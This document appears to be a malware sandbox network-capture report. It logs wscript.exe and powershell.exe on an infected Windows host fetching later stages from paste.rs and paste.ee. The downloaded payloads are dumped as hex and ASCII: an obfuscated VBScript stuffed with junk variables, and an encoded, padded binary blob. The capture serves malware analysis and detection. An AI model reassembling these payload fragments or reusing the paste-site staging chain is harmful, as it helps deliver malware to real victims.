                                                        2024-12-17 13:30:37 UTC1369INData Raw: 77 67 4e 4d 53 44 44 78 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a
                                                        Data Ascii: wgNMSDDxw8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7j


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.64979045.63.94.2144437864C:\Windows\System32\wscript.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-17 13:30:39 UTC317OUTGET /LDDIb HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-ch
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                        Host: paste.rs
                                                        Connection: Keep-Alive
                                                        2024-12-17 13:30:40 UTC439INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 17 Dec 2024 13:30:39 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 79269
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        x-content-type-options: nosniff
                                                        permissions-policy: interest-cohort=()
                                                        x-frame-options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains;
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        2024-12-17 13:30:40 UTC15945INData Raw: 0d 0a 20 20 20 20 0d 0a 55 76 4c 67 53 47 65 4e 43 63 70 78 41 64 4a 20 3d 20 22 4c 78 42 66 4c 62 6d 47 5a 67 52 50 7a 62 4b 22 0d 0a 55 50 68 41 63 6d 4c 4c 69 62 6b 4b 47 5a 71 20 3d 20 22 57 64 43 49 4c 63 6b 72 4f 57 5a 57 51 5a 4e 22 0d 0a 57 4b 63 41 4a 4e 74 57 41 65 4f 47 6a 43 61 20 3d 20 22 68 6b 50 49 55 7a 62 72 57 5a 4b 6b 63 50 70 22 0d 0a 0d 0a 6f 65 78 42 4b 6f 47 70 63 4a 4e 68 50 57 66 20 3d 20 22 55 67 4b 63 4c 75 53 68 47 4f 4b 52 4c 64 57 22 0d 0a 65 4b 6b 65 47 69 74 4b 6d 50 63 47 47 4b 71 20 3d 20 22 6b 70 57 6d 4b 55 63 78 53 6b 4c 4c 57 57 50 22 0d 0a 5a 6d 41 63 4b 6f 47 69 53 69 55 4c 69 4b 7a 20 3d 20 22 5a 70 63 54 41 4c 4c 6d 4c 63 4c 73 4c 63 63 22 0d 0a 55 57 66 68 74 4c 4b 57 55 55 67 6f 50 71 7a 20 3d 20 22 62 54 70 6b
                                                        Data Ascii: UvLgSGeNCcpxAdJ = "LxBfLbmGZgRPzbK"UPhAcmLLibkKGZq = "WdCILckrOWZWQZN"WKcAJNtWAeOGjCa = "hkPIUzbrWZKkcPp"oexBKoGpcJNhPWf = "UgKcLuShGOKRLdW"eKkeGitKmPcGGKq = "kpWmKUcxSkLLWWP"ZmAcKoGiSiULiKz = "ZpcTALLmLcLsLcc"UWfhtLKWUUgoPqz = "bTpk
                                                        2024-12-17 13:30:40 UTC16384INData Raw: 20 22 6b 4e 69 4a 74 70 69 6d 6e 61 69 70 69 4b 55 22 0d 0a 4f 61 57 57 71 57 68 57 68 4c 4c 69 4c 57 6b 20 3d 20 22 4c 4e 5a 47 69 50 41 66 47 57 50 78 47 4b 72 22 0d 0a 42 64 75 70 57 55 55 4f 41 62 49 61 70 65 57 20 3d 20 22 57 57 4b 69 4c 74 4c 6c 50 4c 7a 4c 4c 6d 55 22 0d 0a 63 4c 66 57 61 65 4b 52 63 65 41 55 6b 67 75 20 3d 20 22 41 53 75 73 4c 57 4b 6f 7a 6f 69 53 6d 4f 61 22 0d 0a 52 52 66 62 72 6d 4c 4e 4c 4c 53 76 5a 4c 73 20 3d 20 22 62 57 76 68 6b 47 4b 7a 7a 52 4b 53 6d 64 69 22 0d 0a 0d 0a 69 6b 69 4e 68 68 5a 4c 4b 62 63 4b 57 41 4b 20 3d 20 22 62 76 4b 6f 6b 62 4c 4f 4c 48 57 57 4b 63 65 22 0d 0a 6b 4c 55 6b 52 4b 55 69 6f 69 4b 47 69 6b 57 20 3d 20 22 57 70 4b 6b 47 4c 63 6d 6f 55 70 68 69 63 4b 22 0d 0a 72 4c 6b 68 4c 74 61 66 51 43 72
                                                        Data Ascii: "kNiJtpimnaipiKU"OaWWqWhWhLLiLWk = "LNZGiPAfGWPxGKr"BdupWUUOAbIapeW = "WWKiLtLlPLzLLmU"cLfWaeKRceAUkgu = "ASusLWKozoiSmOa"RRfbrmLNLLSvZLs = "bWvhkGKzzRKSmdi"ikiNhhZLKbcKWAK = "bvKokbLOLHWWKce"kLUkRKUioiKGikW = "WpKkGLcmoUphicK"rLkhLtafQCr
                                                        2024-12-17 13:30:40 UTC16384INData Raw: 70 55 4a 62 72 70 6f 42 65 73 57 7a 52 20 3d 20 22 65 69 57 4c 6c 4b 4b 5a 4c 52 61 47 62 4f 4a 22 0d 0a 72 6f 6f 7a 75 74 52 47 68 6f 75 6d 66 4c 66 20 3d 20 22 6d 63 75 57 63 50 57 67 4b 4b 6d 69 52 7a 51 22 0d 0a 78 5a 43 6b 6d 52 4c 4c 70 55 4c 4b 69 42 4f 20 3d 20 22 61 6b 65 57 64 57 62 57 4b 71 7a 71 4c 4c 4b 22 0d 0a 50 70 43 52 50 4c 4c 4f 57 78 6b 69 55 4c 4c 20 3d 20 22 4c 6e 4e 51 4c 71 4c 63 4c 4b 47 6d 71 6b 63 22 0d 0a 0d 0a 6c 62 68 4c 66 69 71 6f 4c 64 57 4c 72 7a 41 20 3d 20 22 70 4b 69 6f 55 4c 62 6b 6e 4c 73 6d 69 62 4c 22 0d 0a 41 50 6b 6e 4c 4c 6d 4c 48 55 4c 52 52 4c 67 20 3d 20 22 57 54 43 4b 47 57 47 71 7a 4b 62 4c 50 55 51 22 0d 0a 47 53 69 7a 4a 65 4f 49 4c 4e 4c 78 47 4b 51 20 3d 20 22 6f 55 63 4f 65 4c 4b 55 6a 6c 47 7a 4f 47
                                                        Data Ascii: pUJbrpoBesWzR = "eiWLlKKZLRaGbOJ"roozutRGhoumfLf = "mcuWcPWgKKmiRzQ"xZCkmRLLpULKiBO = "akeWdWbWKqzqLLK"PpCRPLLOWxkiULL = "LnNQLqLcLKGmqkc"lbhLfiqoLdWLrzA = "pKioULbknLsmibL"APknLLmLHULRRLg = "WTCKGWGqzKbLPUQ"GSizJeOILNLxGKQ = "oUcOeLKUjlGzOG
                                                        2024-12-17 13:30:40 UTC16384INData Raw: 5a 55 69 70 7a 70 63 75 7a 6f 6e 69 6f 41 22 0d 0a 62 47 54 76 65 5a 68 57 62 61 5a 41 64 63 69 20 3d 20 22 55 6d 49 57 6e 43 73 57 42 57 6b 57 4b 4c 4c 22 0d 0a 70 52 4c 57 4c 6b 66 5a 64 50 75 4b 75 69 4c 20 3d 20 22 57 67 51 52 4b 5a 62 5a 65 4e 4b 57 4b 4a 57 22 0d 0a 0d 0a 76 41 71 4c 4f 63 78 62 66 78 50 6c 61 53 4a 20 3d 20 22 68 76 73 61 67 6e 6b 6e 57 69 48 4c 57 48 70 22 0d 0a 4b 75 62 66 7a 62 63 47 4c 50 6f 4c 42 55 73 20 3d 20 22 4c 69 66 62 55 65 69 54 62 47 41 69 57 74 63 22 0d 0a 6f 65 55 69 69 66 47 63 51 4c 57 4e 4b 74 47 20 3d 20 22 4c 4e 4c 6b 65 50 63 4b 4b 7a 69 6d 52 6b 6c 22 0d 0a 69 63 6f 68 47 51 55 51 41 48 63 47 76 42 5a 20 3d 20 22 61 4b 4b 4b 4c 57 65 6f 76 4f 41 53 65 62 4c 22 0d 0a 68 6e 71 72 55 71 78 71 61 42 63 51 61 57
                                                        Data Ascii: ZUipzpcuzonioA"bGTveZhWbaZAdci = "UmIWnCsWBWkWKLL"pRLWLkfZdPuKuiL = "WgQRKZbZeNKWKJW"vAqLOcxbfxPlaSJ = "hvsagnknWiHLWHp"KubfzbcGLPoLBUs = "LifbUeiTbGAiWtc"oeUiifGcQLWNKtG = "LNLkePcKKzimRkl"icohGQUQAHcGvBZ = "aKKKLWeovOASebL"hnqrUqxqaBcQaW
                                                        2024-12-17 13:30:40 UTC14172INData Raw: 0a 62 4c 61 47 6f 67 6c 57 78 6b 62 47 72 6b 72 20 3d 20 22 50 63 4c 6f 49 73 4f 6e 5a 66 4b 4c 4e 74 4f 22 0d 0a 69 47 41 6d 5a 53 54 57 4b 69 43 41 4c 57 42 20 3d 20 22 6d 63 62 6c 4c 67 71 75 4e 74 75 4b 6f 6f 64 22 0d 0a 0d 0a 73 6e 4b 4f 64 74 6d 71 4e 74 4b 43 50 6d 70 20 3d 20 22 4f 47 64 75 69 62 4c 69 47 73 66 4c 4c 63 65 22 0d 0a 61 78 6b 52 4b 64 65 55 4a 50 47 63 7a 63 65 20 3d 20 22 47 5a 4c 4b 47 66 57 73 4b 65 75 55 50 4b 53 22 0d 0a 6b 62 57 78 47 6f 4c 4b 42 57 55 4e 52 4c 4e 20 3d 20 22 62 66 42 47 7a 55 71 4b 69 74 7a 6a 50 74 42 22 0d 0a 4a 7a 42 55 78 4c 4c 5a 63 65 55 61 43 4c 6e 20 3d 20 22 71 63 68 5a 4c 65 47 6b 6f 42 47 41 5a 4c 42 22 0d 0a 69 57 4f 42 6f 4e 74 55 70 4c 4b 4b 4b 63 4c 20 3d 20 22 68 52 63 57 4c 55 4b 6f 48 57 57
                                                        Data Ascii: bLaGoglWxkbGrkr = "PcLoIsOnZfKLNtO"iGAmZSTWKiCALWB = "mcblLgquNtuKood"snKOdtmqNtKCPmp = "OGduibLiGsfLLce"axkRKdeUJPGczce = "GZLKGfWsKeuUPKS"kbWxGoLKBWUNRLN = "bfBGzUqKitzjPtB"JzBUxLLZceUaCLn = "qchZLeGkoBGAZLB"iWOBoNtUpLKKKcL = "hRcWLUKoHWW


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.649880104.21.84.674437972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-17 13:31:14 UTC67OUTGET /r/IUrXP/0 HTTP/1.1
                                                        Host: paste.ee
                                                        Connection: Keep-Alive
                                                        2024-12-17 13:31:15 UTC1280INHTTP/1.1 200 OK
                                                        Date: Tue, 17 Dec 2024 13:31:14 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=63072000
                                                        x-frame-options: DENY
                                                        x-content-type-options: nosniff
                                                        x-xss-protection: 1; mode=block
                                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                        CF-Cache-Status: HIT
                                                        Age: 24599
                                                        Last-Modified: Tue, 17 Dec 2024 06:41:15 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NpxBhqOayCC49ET9Un5JRMBnZzY2lZGmwQUaETW1wihDvPMf7OJfhACk3GPKfLLmGN7TTiF4X4ckTgn32aNAZyvgWYDaAeMNCutoqNYEfNzKNKuzyXHfq4zkRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f3745ba1fcf1819-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-12-17 13:31:15 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 36 35 26 6d 69 6e 5f 72 74 74 3d 31 35 36 30 26 72 74 74 5f 76 61 72 3d 35 39 36 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 38 31 37 30 35 30 26 63 77 6e 64 3d 32 31 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 37 35 64 61 34 64 39 36 38 34 64 32 66 36 62 26 74 73 3d 34 35 39 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1560&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1817050&cwnd=215&unsent_bytes=0&cid=b75da4d9684d2f6b&ts=459&x=0"
                                                        2024-12-17 13:31:15 UTC1243INData Raw: 33 38 33 32 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                        Data Ascii: 3832AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 67 44 4a 34 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41 49 41 34 41 49 4f
                                                        Data Ascii: gDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGAIA4AIO
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33 51 39 4e 4d
                                                        Data Ascii: Dx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NM
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 36 31 41 65 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c
                                                        Data Ascii: 61AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwL
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 36 51 6d 4f 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33 41 35 4e 4d 65 44
                                                        Data Ascii: 6QmOcpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5NMeD
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 41 41 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b 42 4d 53 41 41 41
                                                        Data Ascii: AAAA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwkBMSAAA
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 78 4d 4e 4e 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68 4f 48 6b 7a 34 35
                                                        Data Ascii: xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6khOHkz45
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 4e 50 4d 44 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41 30 41 77 41 77 44
                                                        Data Ascii: NPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwD
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72
